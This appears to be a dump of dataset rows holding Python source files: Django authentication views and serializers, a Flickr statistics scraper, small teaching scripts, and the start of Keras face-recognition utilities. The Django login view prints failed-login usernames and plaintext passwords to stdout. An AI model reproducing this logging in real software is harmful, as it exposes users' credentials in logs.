blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0e3a6ea93b8832b3a2244ca253fd45da5eb46ddd | 02d30d5aff19c43dd42ef4fc0f60184bacd80804 | /djangox/dappx/views.py | 9813e9a608072b6f6fbd86386d0c13a30435fdcf | [] | no_license | taxwizard/magic | 61e88345b1ff8b49174b728cc8e178751d13d148 | b6d9b26f55a13619c7de69fadba215fa059a8cde | refs/heads/master | 2020-04-09T09:32:02.357215 | 2018-12-03T18:45:31 | 2018-12-03T18:45:31 | 160,237,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,431 | py | from django.shortcuts import render
# Create your views here.
from django.shortcuts import render
from dappx.forms import UserForm,UserProfileInfoForm
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect, HttpResponse
from django.urls import reverse
from django.contrib.auth.decorators import login_required
def index(request):
    """Render the public landing page (dappx/index.html)."""
    return render(request,'dappx/index.html')
@login_required
def special(request):
    """Minimal authenticated-only view used to verify that login works."""
    return HttpResponse("You are logged in !")
@login_required
def user_logout(request):
    """Log the current user out and redirect to the landing page."""
    logout(request)
    return HttpResponseRedirect(reverse('index'))
def register(request):
    """Handle user sign-up with a linked profile.

    On POST, validates both the user form and the profile form; on GET,
    renders empty forms. `registered` drives the template's success state.
    """
    registered = False
    if request.method == 'POST':
        user_form = UserForm(data=request.POST)
        profile_form = UserProfileInfoForm(data=request.POST)
        if user_form.is_valid() and profile_form.is_valid():
            user = user_form.save()
            # Re-save with a hashed password; the form stored it as plain text.
            user.set_password(user.password)
            user.save()
            # commit=False: delay the profile INSERT until the FK to user is set.
            profile = profile_form.save(commit=False)
            profile.user = user
            if 'profile_pic' in request.FILES:
                print('found it')
                profile.profile_pic = request.FILES['profile_pic']
            profile.save()
            registered = True
        else:
            print(user_form.errors,profile_form.errors)
    else:
        # GET: present blank forms.
        user_form = UserForm()
        profile_form = UserProfileInfoForm()
    return render(request,'dappx/registration.html',
                  {'user_form':user_form,
                   'profile_form':profile_form,
                   'registered':registered})
def user_login(request):
    """Authenticate a user from POSTed credentials; render the form on GET."""
    if request.method == 'POST':
        username = request.POST.get('username')
        password = request.POST.get('password')
        user = authenticate(username=username, password=password)
        if user:
            if user.is_active:
                login(request,user)
                return HttpResponseRedirect(reverse('index'))
            else:
                return HttpResponse("Your account was inactive.")
        else:
            # NOTE(review): logging the attempted password to stdout is a
            # security concern — consider removing before production use.
            print("Someone tried to login and failed.")
            print("They used username: {} and password: {}".format(username,password))
            return HttpResponse("Invalid login details given")
    else:
        return render(request, 'dappx/login.html', {})
"noreply@github.com"
] | taxwizard.noreply@github.com |
1f07585f8b5bd8b97955c465f76f0b70ac4458b1 | 19be6560901ac2d1c2c1cfa307adb84295e58a9e | /backoffice/urls.py | 2e272952075115a11bb1b203fa20a5f776dcfd7c | [] | no_license | Neutrinet/backoffice | ebacf44cf9f7c7581a593a6986f1e83c2cfe2591 | cb87571a87a4f6fec54d47095e454080cf6fbe5c | refs/heads/master | 2023-04-20T09:18:31.755593 | 2023-03-30T20:54:49 | 2023-03-30T20:54:49 | 36,190,840 | 1 | 0 | null | 2017-12-11T18:13:23 | 2015-05-24T20:10:06 | Python | UTF-8 | Python | false | false | 349 | py | from members.views import ffdn_api
from django.conf.urls import include, url
from django.contrib import admin
# URL routing table: admin sites, ordering/accounts apps, and an FFDN
# ISP-description JSON endpoint at /isp.json.
urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^admin2/', include('admin2.urls')),
    url(r'^', include('ordering.urls')),
    url(r'^accounts/', include('accounts.urls')),
    url(r'^isp.json$', ffdn_api),
]
| [
"cortex@worlddomination.be"
] | cortex@worlddomination.be |
2ffedc23f5598055bb31dcde684639506383dbea | 6e543b48f8c18b21b890c65b1adcc0d39ccb0844 | /missionpawssible/projects/serializers.py | 862c894990a91062be535d666b951bdb31867eb5 | [] | no_license | JuLacerdaRod/go-fund-she | af97330d768d776f9258edf3059f3892bb16f1a8 | 83f2d6be406fad46c65007388c315e47989191f4 | refs/heads/main | 2023-08-24T09:48:50.779765 | 2021-09-21T09:18:23 | 2021-09-21T09:18:23 | 405,237,179 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,395 | py | from rest_framework import serializers
from .models import Project, Pledge
class PledgeSerializer(serializers.Serializer):
    """Serializer for Pledge objects (create + read)."""
    id = serializers.ReadOnlyField()
    amount = serializers.IntegerField()
    comment = serializers.CharField(max_length=200)
    anonymous = serializers.BooleanField()
    # Exposed as the supporter's user id; set by the view, not the client.
    supporter_id = serializers.ReadOnlyField(source='supporter.id')
    project_id = serializers.IntegerField()

    def create(self, validated_data):
        """Create and return a new Pledge from validated input."""
        return Pledge.objects.create(**validated_data)
class PledgeDetailSerializer(PledgeSerializer):
    """Detail serializer adding full-update support for a single Pledge."""
    # pledges = PledgeSerializer(many=True, read_only=True)

    def update(self, instance, validated_data):
        """Apply validated fields to an existing Pledge and save it."""
        instance.amount = validated_data.get('amount',instance.amount)
        instance.comment = validated_data.get('comment',instance.comment)
        instance.anonymous = validated_data.get('anonymous',instance.anonymous)
        instance.supporter = validated_data.get('supporter',instance.supporter)
        instance.project_id = validated_data.get('project_id',instance.project_id)
        instance.save()
        return instance
class ProjectSerializer(serializers.Serializer):
    """List/create serializer for crowdfunding Project objects."""
    id = serializers.ReadOnlyField()
    title = serializers.CharField(max_length=200)
    description = serializers.CharField(max_length=None)
    goal = serializers.IntegerField()
    image = serializers.URLField()
    is_open = serializers.BooleanField()
    date_created = serializers.DateTimeField()
    # Owner is taken from the authenticated request, never from the payload.
    owner = serializers.ReadOnlyField(source='owner.id')
    # pledges = PledgeSerializer(many=True, read_only=True)

    def create(self, validated_data):
        """Create and return a new Project from validated input."""
        return Project.objects.create(**validated_data)
class ProjectDetailSerializer(ProjectSerializer):
    """Detail serializer: nests the project's pledges and supports updates."""
    pledges = PledgeSerializer(many=True, read_only=True)

    def update(self, instance, validated_data):
        """Apply validated fields to an existing Project and save it."""
        instance.title = validated_data.get('title',instance.title)
        instance.description = validated_data.get('description',instance.description)
        instance.goal = validated_data.get('goal',instance.goal)
        instance.image = validated_data.get('image',instance.image)
        instance.is_open = validated_data.get('is_open',instance.is_open)
        instance.date_created = validated_data.get('date_created',
                                                   instance.date_created)
        instance.owner = validated_data.get('owner',instance.owner)
        instance.save()
        return instance
"julacerdarod@gmail.com"
] | julacerdarod@gmail.com |
cfab73f899955cd6e504bcd7366d6dbf57f3daa9 | f8d29bab926173769b77045bf2c9d7037bd41427 | /liwc_pre.py | a3d122b71633a4cdb972a4ef16e8082a8dbf0392 | [] | no_license | rz-zhang/Reddit-Roles-Identification | c7ca5c05b2b5154240f3bf92addf00e36142c857 | 203bdbc5cbcaf7cfd4b4980ef0568899a58cd962 | refs/heads/master | 2022-04-28T04:21:49.384212 | 2020-04-28T03:51:38 | 2020-04-28T03:51:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,861 | py | # Find the authors who are in the author_rep list,
# and look for their comments in the corresponding month,
# extend the representation with the liwc analysis results
import praw
from praw import models
import pandas
from util import in_duration
import pprint
reddit = praw.Reddit(client_id='O3eCkJp5u4-S-Q',
client_secret='zBLTi3qGzBn0qdkvvA4Fdf0NZGE',
password='777zrz777',
user_agent='RonzeyZhang v1.0 by /u/RonzeyZhang',
username='RonzeyZhang')
month = '2019_01'
root_path = 'D:/Research/roleIdentification/dataset'
authors_path = '{}/author_{}_rep'.format(root_path,month)
comments_path = '{}/comment_{}.csv'.format(root_path,month)
authors_file = open(authors_path, encoding='utf8')
comments_file = open(comments_path, encoding='utf8')
count = 0
comments_csv = pandas.read_csv(comments_path)
for line in authors_file.readlines()[1:]:
author_name = line.split(',')[0] # prevent the same sub strings are found in comment_body field
title = author_name
text_output = ''
redditor = praw.models.Redditor(reddit, name = author_name)
author_comments = []
redditor_comments = comments_csv['body'][comments_csv['author'] == author_name]
# count the number of each user's comments in a specific time period
title += ' ' + str(redditor_comments.values.size) # number of comments
for comment in redditor_comments.values:
comment = ' '.join(comment.split())
text_output += (comment + '\n')
count += 1
print(count)
author_comments_path = '{}/authors_comments_{}/{}.txt'.format(root_path, month, title)
author_comments_file = open(author_comments_path, 'w', encoding='utf8')
author_comments_file.write(text_output)
author_comments_file.close()
| [
"noreply@github.com"
] | rz-zhang.noreply@github.com |
908bab1dfe33c354c3f5947bb5bd3268cfa0f337 | ea508c55e951f23ec2f4f5ff35b193d9f30a989a | /pyext/test.py | d7b0ce4ba8ffc10b98cd26926e8478b87f8826c4 | [
"Apache-2.0"
] | permissive | intel-ai/pysamprof | f746551e30237fae9b8869e5e05156a3cb2aba13 | 643de4dd8260c9cd2f75ad5accf9b2e4cbd96c4d | refs/heads/master | 2023-01-25T02:21:01.665315 | 2020-11-27T08:18:22 | 2020-11-27T08:18:22 | 159,366,126 | 2 | 1 | Apache-2.0 | 2020-12-03T15:32:18 | 2018-11-27T16:30:40 | C | UTF-8 | Python | false | false | 752 | py | #!/usr/bin/env python
import pysamprof
import threading
import os
import errno
import sys
import subprocess
def start_collection():
    """Start pysamprof collection into the first free ./results/<N> directory.

    Scans results/0, results/1, ... until a non-existing path is found and
    passes it to pysamprof.start (which is expected to create it).
    """
    counter = 0
    while True:
        target_path = '%s/results/%s' % (os.getcwd(), counter)
        if os.path.exists(target_path):
            counter += 1
        else:
            break
    pysamprof.start(target_path)
def task():
    """Busy-loop for ~1 second to give the profiler something to sample."""
    # Local imports keep the module import itself cheap; `socket` appears
    # unused here — possibly left from an earlier variant of the test.
    import time
    import socket
    stop = time.time() + 1
    while time.time() <= stop:
        pass
if __name__ == '__main__':
    # Optional child-process test left disabled:
    # proc = subprocess.Popen([sys.executable,
    #    os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'subtest.py')])
    # Start profiling, run the CPU-bound task on a worker thread, then wait.
    start_collection()
    th = threading.Thread(target=task)
    th.start()
    th.join()
    # proc.wait()
| [
"vasilij.n.litvinov@intel.com"
] | vasilij.n.litvinov@intel.com |
afa32d1c3d5daebf1a948e6638727b886e31b161 | 5c9511bc538045389e28183b0bc65d9b6cf51b85 | /05/Funkce.py | 5816b5e366a4ab2d42b8b4d3d4a990295a30d386 | [] | no_license | balonovatereza/Pyladies-repository | 0174360835dd1094532118eda1e2821da8108f77 | d4ad0dae829d21a56e6fb86d7a7dcfdc9387ae27 | refs/heads/master | 2020-05-01T09:25:25.300245 | 2019-05-18T09:10:50 | 2019-05-18T09:10:50 | 177,399,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | from math import pi
def obsah_elipsy(a, b):
    """Return the area of an ellipse with the given semi-axes."""
    return a * b * pi
# Demo call of the function above, then two module-level names that the
# second obsah_elipsy definition below will shadow locally.
print('Obsah elipsy s osami 4 a 6 cm je', obsah_elipsy(4, 6), 'cm2.')

obsah = 0
a = 30
def obsah_elipsy(a, b):
    """Teaching variant: assignments inside a function are local only."""
    obsah = pi * a * b  # Assignment to local `obsah` (does not touch the global)
    a = a + 3  # Assignment to local `a` (deliberate demo; has no outside effect)
    return obsah
# The globals `obsah` and `a` are unchanged by the function call above.
print(obsah_elipsy(a, 20))
print(obsah)
print(a)

# Unicode escapes by character name.
print('--\N{LATIN SMALL LETTER L WITH STROKE}--')
print('--\N{SECTION SIGN}--')
print('--\N{PER MILLE SIGN}--')
print('--\N{BLACK STAR}--')
print('--\N{SNOWMAN}--')
print('--\N{KATAKANA LETTER TU}--')

# String methods return new strings; the original is unchanged.
retezec = 'Ahoj'
print(retezec.upper())
print(retezec.lower())
print(retezec)

# Build initials from user input (first letter of each name).
jmeno = input('Zadej jmeno: ')
prijmeni = input('Zadej prijmeni: ')
inicialy = jmeno[0] + prijmeni[0]
print('Tvoje inicialy jsou: ', inicialy.upper())
"balonova.tereza@seznam.cz"
] | balonova.tereza@seznam.cz |
d5c8d40acc3d63d3f90c826b6f55231a1363ca22 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_september.py | 50ec52f86c7a3f910be158d3734960cae05fab5d | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py |
#calss header
class _SEPTEMBER():
def __init__(self,):
self.name = "SEPTEMBER"
self.definitions = [u'the ninth month of the year, after August and before October: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
9e512c5d9e8119a11810e649608867f8a3af320f | fe2732ca61b61b1c26b932af40dc5fb79117e8da | /build/prepare_patch_release.py | 19cb94a4938378cd226d454f8f3d6b14fc03e8e5 | [
"Apache-2.0"
] | permissive | approvals/ApprovalTests.cpp.Qt | ac0c00611752d5704330300e725baf3b8494a7c5 | 7183690eaa50334dfc70d0ec02599a89e154ceb2 | refs/heads/master | 2022-08-21T15:59:12.750971 | 2022-08-15T16:42:23 | 2022-08-15T16:42:23 | 215,129,552 | 12 | 1 | Apache-2.0 | 2020-01-24T20:36:51 | 2019-10-14T19:34:07 | C++ | UTF-8 | Python | false | false | 311 | py | #! /usr/bin/env python3
import scripts_qt.include_approvals_path # Note This is used!
from scripts.prepare_release import build
from scripts_qt.qt_project_details import qt_project_details
if __name__ == '__main__':
    # Bump only the patch component; deploy=False keeps this a dry release prep.
    build(lambda v: v.update_patch(), deploy = False, project_details=qt_project_details())
| [
"github@cfmacrae.fastmail.co.uk"
] | github@cfmacrae.fastmail.co.uk |
8491422835ce360f0b87c4cbba1d2b1e856f3031 | 25714f66fb3409b37cd147c0df6aa7b45bc361e2 | /src/flickrStatRetriever.py | ad376bfc1cb8b36053ec044a7e6124c21f7fe8c1 | [] | no_license | shelbrudy/flickr-photo-stat-retriever | 5fdf8bd14bd21e26a17fc0380f0823f6c255c87e | 062ba1621d4eb3b47ae2abdd507bf3970926dfeb | refs/heads/master | 2020-03-18T01:00:58.077605 | 2018-05-20T05:50:27 | 2018-05-20T05:50:27 | 134,123,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,191 | py | import flickrapi
from flickrapi import FlickrAPI
import datetime as datetime
import csv
import argparse
import googlemaps
import time
import sys
import config
import requests
#globals
# NOTE(review): API keys were redacted; hard-coding credentials here is a
# security risk — load them from the environment instead.
gmaps_key = 'redacted'
public_key = 'redacted'
secret_key = 'redacted'
# Module-level API clients shared by every function below.
flickr = FlickrAPI(public_key, secret_key, format='parsed-json')
gmaps = googlemaps.Client(key=gmaps_key)
#methods
def convertTimestamp(unix_timestamp):
    """Convert a unix timestamp to a local 'YYYY-MM-DD HH:MM:SS' string.

    The Flickr payloads sometimes carry the sentinel strings 'null' or
    'empty' instead of a timestamp; those are returned unchanged.

    Bug fix: the original condition was
    `unix_timestamp != 'null' or date_posted != 'empty'`, where
    `date_posted` is an undefined name — so a 'null' input raised NameError
    instead of falling through to `return unix_timestamp`.
    """
    if unix_timestamp in ('null', 'empty'):
        return unix_timestamp
    return datetime.datetime.fromtimestamp(int(unix_timestamp)).strftime('%Y-%m-%d %H:%M:%S')
def createCSV(records_list, file_name, mode):
    """Write `records_list` (a list of row lists) to `file_name` as CSV.

    mode: 'append' adds rows to an existing file; 'overwrite' replaces it.

    Raises:
        ValueError: for any other mode. (The original left `write_mode`
        unbound and crashed with NameError at the `open` call.)
    """
    if mode == 'append':
        write_mode = 'a'
    elif mode == 'overwrite':
        write_mode = 'w'
    else:
        raise ValueError("mode must be 'append' or 'overwrite', got %r" % (mode,))
    # newline='' is required by the csv module to avoid blank rows on Windows.
    with open(file_name, write_mode, newline='') as f:
        writer = csv.writer(f)
        writer.writerows(records_list)
def createRedoList(redo_list):
    """Persist ids that failed transiently to ./results/redo.txt for a re-run."""
    contents = ''.join(redo_list)
    with open("./results/redo.txt", "w") as redo_file:
        redo_file.write(contents)
def parseImageList(file_name):
    """Return the lines of `file_name` as a list, trailing newlines preserved.

    Improvement: uses a with-statement so the handle is closed even if
    reading raises (the original closed it manually and also had a
    redundant initial `img_list = []` assignment).
    """
    with open(file_name) as f:
        return f.readlines()
def retrieveUserCoordinates(location):
    """Geocode a free-text location via the Google Maps client.

    Returns [lat, lng] from the first geocoding result, or ['', ''] when
    the location string is empty. May raise googlemaps exceptions (handled
    by the caller) or IndexError if geocoding returns no results —
    NOTE(review): the empty-result case is not guarded here.
    """
    lat_long = []
    if location != '':
        location_dict = gmaps.geocode(location)[0]
        lat_long.append(location_dict['geometry'].get('location', {}).get('lat', ''))
        lat_long.append(location_dict['geometry'].get('location', {}).get('lng', ''))
        return lat_long
    else:
        return(['', ''])
def parsePhotoInfo(photo_dict, favorites_dict):
    """Flatten the Flickr photo + favorites payloads into one stats row.

    Row order: taken date, posted date (converted), latitude, longitude,
    comment count, view count, favorite count. Missing fields become ''.
    """
    photo = photo_dict['photo']
    location = photo.get('location', {})
    return [
        photo.get('dates', {}).get('taken', ''),
        convertTimestamp(photo.get('dates', {}).get('posted', '')),
        location.get('latitude', ''),
        location.get('longitude', ''),
        photo.get('comments', {}).get('_content', ''),
        photo.get('views', ''),
        favorites_dict['photo'].get('total', ''),
    ]
def parseUserInfo(user_dict):
    """Flatten a Flickr person payload into one stats row.

    Row order: user id, pro-account flag, geocoded lat, geocoded lng,
    first-photo-taken date, first-photo-posted date (converted), photo count.
    """
    user_info = []
    user_info.append(user_dict['person'].get('id', ''))
    user_info.append(user_dict['person'].get('ispro', ''))
    user_location = user_dict['person'].get('location', {}).get('_content', '')
    # Geocoding may hit the network; timeouts are handled by the caller.
    user_info.extend(retrieveUserCoordinates(user_location))
    user_info.append(user_dict['person']['photos'].get('firstdatetaken', {}).get('_content', ''))
    user_info.append(convertTimestamp(user_dict['person']['photos'].get('firstdate', {}).get('_content', '')))
    user_info.append(str(user_dict['person']['photos'].get('count', {}).get('_content', '')))
    return user_info
def createRecord(photo_id, flickr_photo_id, user_info, photo_info):
    """Assemble one output row: id, flickr id, photo stats, then user stats."""
    return [photo_id.strip(), flickr_photo_id, *photo_info, *user_info]
def main(input_file, output_file, mode):
    """Fetch photo + owner stats for every id in `input_file` and write CSVs.

    Produces three outputs: `output_file` (one row per photo),
    ./results/reject.csv (ids that failed with a definite API error), and
    ./results/redo.txt (ids that failed transiently and should be retried).
    `mode` is passed through to createCSV ('append' or 'overwrite').
    """
    img_list = parseImageList(input_file)
    record_list = []
    reject_list = []
    redo_list = []
    if mode != 'append':
        # Fresh file: start with the header rows from config.
        record_list.append(config.record_schema)
        reject_list.append(config.reject_schema)
    counter = 1;
    for photo_id in img_list:
        print("Processing image {} out of {}".format(counter, len(img_list)))
        counter = counter+1
        record = []
        reject = []
        photo_info = []
        user_info = []
        # Filenames look like '<flickrid>_<hash>...'; keep only the id part.
        flickr_photo_id = photo_id.partition('_')[0]
        try:
            photo_dict = flickr.photos.getInfo(api_key = public_key, photo_id=flickr_photo_id)
            favorites_dict = flickr.photos.getFavorites(api_key = public_key, photo_id=flickr_photo_id)
            photo_info = parsePhotoInfo(photo_dict, favorites_dict)
            user_dict = flickr.people.getinfo(api_key = public_key, user_id = photo_dict['photo']['owner']['nsid'])
            user_info = parseUserInfo(user_dict)
        except flickrapi.exceptions.FlickrError as e:
            if e.code == None:
                # No error code usually means a transport problem: retry later.
                redo_list.append(photo_id)
                continue
            else:
                # Definite API rejection: record the id and error code.
                if not photo_info:
                    photo_info = ['']*7
                if not user_info:
                    user_info = ['']*7
                reject.append(photo_id.rstrip())
                reject.append(photo_id.partition('_')[0])
                reject.append(e.code)
                reject_list.append(reject)
        except requests.exceptions.ConnectionError as e:
            redo_list.append(photo_id)
            continue
        except googlemaps.exceptions.Timeout as e:
            redo_list.append(photo_id)
            continue
        except:
            # Unknown failure: log it, and file a reject row with code 'x'.
            print("Unexpected error:", sys.exc_info()[0])
            if not photo_info:
                photo_info = ['']*7
            if not user_info:
                user_info = ['']*7
            reject.append(photo_id.rstrip())
            reject.append(photo_id.partition('_')[0])
            reject.append('x')
            reject_list.append(reject)
        # Reached for successes AND for rejected ids (whose info stays
        # blank), but not for ids routed to the redo list (continue above).
        record_list.append(createRecord(photo_id, flickr_photo_id, user_info, photo_info))
    createRedoList(redo_list)
    createCSV(record_list, output_file, mode)
    createCSV(reject_list, './results/reject.csv', mode)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Application to retrieve social media statistics from the Flickr API')
parser.add_argument('f',
help='Input file to be processed')
parser.add_argument('o',
help='File output is to be written to')
parser.add_argument('m',
help='Mode for output file (append or overwrite)')
args = parser.parse_args()
if(args.f):
print("Input file is %s" % args.f)
else:
print("NO INPUT FILE")
exit()
if(args.o):
print("Output file is %s" % args.o)
else:
print("NO OUTPUT FILE")
exit()
if(args.m):
print("Output file mode is %s" % args.o)
else:
print("NO OUTPUT MODE")
exit()
main(args.f, args.o, args.m)
| [
"shelbyruettiger@Shelbys-MBP.lan"
] | shelbyruettiger@Shelbys-MBP.lan |
b7e0bc35e5413fbdafa72bec025d37f9520c7afe | efa65c2fa333000a287adee1a427447a00cee502 | /src/cluster/migrations/0004_auto_20180731_1747.py | 9910fa7d37147bb4eb3f540ff8abfcfd51a363fd | [
"MIT"
] | permissive | mrc-rius/computational_marketing_master_thesis | 628786a895a7529acba1b8b43c3d4e392f734404 | 9d64062dde814813e8b4bf03312d8da268585571 | refs/heads/master | 2020-03-28T01:05:28.166689 | 2018-09-05T08:51:38 | 2018-09-05T08:51:38 | 147,476,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | # Generated by Django 2.0.5 on 2018-07-31 15:47
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter Centroids fields: consumption -> IntegerField, power -> CharField(200)."""

    dependencies = [
        ('cluster', '0003_battery_centroids_financing_insurance_maintenance_manager_smarthome_vehicle'),
    ]

    operations = [
        migrations.AlterField(
            model_name='centroids',
            name='consumption',
            field=models.IntegerField(),
        ),
        migrations.AlterField(
            model_name='centroids',
            name='power',
            field=models.CharField(max_length=200),
        ),
    ]
| [
"mrius@factorenergia.com"
] | mrius@factorenergia.com |
ad273f34cf7160c106be57d1e382dd01820c91d6 | 9d2e6046782909323784b92efd0b96705fce1df5 | /django-rest-framework-code-master/albums/urls.py | 68db55be6f85a7bd3bc8fc48ffea956a49c841eb | [] | no_license | Mahe7461/Angular | b08704381ccc730138f942ae1028ab279017a728 | d1e776caa208a75bdd8053966d18f1c2e8f9fe9b | refs/heads/main | 2023-06-17T03:08:14.179893 | 2021-07-09T12:26:00 | 2021-07-09T12:26:00 | 341,572,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 331 | py | from django.conf.urls import url, include
from .views import AlbumViewset, TrackViewset
from rest_framework.routers import DefaultRouter
# Register viewsets on a DRF router; it generates the list/detail routes.
router = DefaultRouter()
router.register("album", AlbumViewset, basename="album")
router.register("track", TrackViewset, basename="track")

urlpatterns = [
    url('', include(router.urls))
]
| [
"mahe7461@gmail.com"
] | mahe7461@gmail.com |
0109a179ee735207ec1b52d992d39e9a466ab901 | d73bb40119baac61263f89cc128c11a2779fc2ad | /0x00-python_variable_annotations/1-concat.py | 0bdb808b6506ac92345101244e777e0bf1fb85d6 | [] | no_license | dlscoccia/holbertonschool-web_back_end | 376bab65447a7ce25116494e34bb14ef074478c4 | cf3291e3f69e14f11cfdfc1ccc1d3d95fbdc0589 | refs/heads/main | 2023-08-25T22:35:35.030155 | 2021-10-20T04:12:58 | 2021-10-20T04:12:58 | 387,456,993 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | #!/usr/bin/env python3
'''python module'''
def concat(str1: str, str2: str) -> str:
    """Return str1 immediately followed by str2."""
    return ''.join((str1, str2))
| [
"2054@holbertonschool.com"
] | 2054@holbertonschool.com |
615abb41b4d786dd18b653f8eb2297d2103ac2db | 4975cb0ef1ea9b1c756846286ee272b45bacdfb4 | /OOP/overall.py | b2a101c9485b9a470d6f3c39a702dfd037828a61 | [] | no_license | thesniya/pythonProgram | 38ead334017719adbb942b91dadab82451866512 | e924c0ca77a720e61a62ba2e1984509be1787ece | refs/heads/master | 2020-11-26T09:06:10.837337 | 2019-12-19T10:10:10 | 2019-12-19T10:10:10 | 229,024,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | class student:
schoolname='luminar technolab' #static variable
def setval(self,id,name):
self.id=id #instance variable
self.name=name
def printval(self):
print(self.id,'==',self.name,'===',student.schoolname)
@classmethod
def setschool(cls,name):
cls.schoolname=name
@staticmethod
def greetings():
print('welcome')
# Demo: set instance values, print, change the shared class attribute, print
# again (school name changes for all instances), then call the static method.
s=student()
s.setval(100,'noname')
s.printval()
s.setschool('luminar technolab sol')
s.printval()
student.greetings()
| [
"thesni77@gmail.com"
] | thesni77@gmail.com |
e5bf7d983f85ce369c1221127a8fc207202bbe62 | 602f399e7dd78fd46a3b1159e081f89533401c9c | /Convolutional Neural Networks/Face Recognition/fr_utils.py | 80ba4fd4006e5718462ef5b16fb89295e46370be | [] | no_license | bhanupratapmall/Deep-learning.ai- | 67a1dc7a1b87d3cd7155fff9613681288b98d3b5 | 416ed3c03f847b4a9349a1832c06245e87fc9242 | refs/heads/master | 2022-12-02T21:26:44.345302 | 2020-08-10T15:53:53 | 2020-08-10T15:53:53 | 283,454,786 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,680 | py | #### PART OF THIS CODE IS USING CODE FROM VICTOR SY WANG: https://github.com/iwantooxxoox/Keras-OpenFace/blob/master/utils.py ####
import tensorflow as tf
import numpy as np
import os
import cv2
from numpy import genfromtxt
from keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate
from keras.models import Model
from keras.layers.normalization import BatchNormalization
from keras.layers.pooling import MaxPooling2D, AveragePooling2D
import h5py
import matplotlib.pyplot as plt
# Default float dtype used by the Keras-backend-style helpers below.
_FLOATX = 'float32'

def variable(value, dtype=_FLOATX, name=None):
    """Create a TF variable from `value` and run its initializer.

    NOTE(review): `_get_session()` is not defined in this module — this
    raises NameError unless it is injected from elsewhere. Confirm before use.
    """
    v = tf.Variable(np.asarray(value, dtype=dtype), name=name)
    _get_session().run(v.initializer)
    return v
def shape(x):
    """Return the static TensorShape of tensor `x`."""
    return x.get_shape()
def square(x):
    """Return the element-wise square of tensor `x`."""
    return tf.square(x)
def zeros(shape, dtype=_FLOATX, name=None):
    """Create an all-zeros initialized variable of the given shape."""
    return variable(np.zeros(shape), dtype, name)
def concatenate(tensors, axis=-1):
    """Concatenate tensors along `axis` (negative axes normalized first).

    NOTE(review): `tf.concat(axis, tensors)` is the pre-TF-1.0 argument
    order; TF >= 1.0 expects `tf.concat(tensors, axis)`.
    """
    if axis < 0:
        axis = axis % len(tensors[0].get_shape())
    return tf.concat(axis, tensors)
def LRN2D(x):
    """Local response normalization with fixed alpha/beta (Inception-style)."""
    return tf.nn.lrn(x, alpha=1e-4, beta=0.75)
def conv2d_bn(x,
              layer=None,
              cv1_out=None,
              cv1_filter=(1, 1),
              cv1_strides=(1, 1),
              cv2_out=None,
              cv2_filter=(3, 3),
              cv2_strides=(1, 1),
              padding=None):
    """Conv -> BatchNorm -> ReLU block, optionally followed by zero padding
    and a second Conv -> BatchNorm -> ReLU (Inception branch helper).

    Layer names follow the '<layer>_conv'/'<layer>_bn' (+ '1'/'2' suffix)
    scheme that load_weights_from_FaceNet relies on. Data is channels-first.
    """
    # '1' suffix only when a second conv follows, so names match WEIGHTS.
    num = '' if cv2_out == None else '1'
    tensor = Conv2D(cv1_out, cv1_filter, strides=cv1_strides, data_format='channels_first', name=layer+'_conv'+num)(x)
    tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer+'_bn'+num)(tensor)
    tensor = Activation('relu')(tensor)
    if padding == None:
        return tensor
    tensor = ZeroPadding2D(padding=padding, data_format='channels_first')(tensor)
    if cv2_out == None:
        return tensor
    tensor = Conv2D(cv2_out, cv2_filter, strides=cv2_strides, data_format='channels_first', name=layer+'_conv'+'2')(tensor)
    tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer+'_bn'+'2')(tensor)
    tensor = Activation('relu')(tensor)
    return tensor
# Names of all layers whose weights are loaded from the exported OpenFace
# CSV files; order and naming must match the files under ./weights.
WEIGHTS = [
    'conv1', 'bn1', 'conv2', 'bn2', 'conv3', 'bn3',
    'inception_3a_1x1_conv', 'inception_3a_1x1_bn',
    'inception_3a_pool_conv', 'inception_3a_pool_bn',
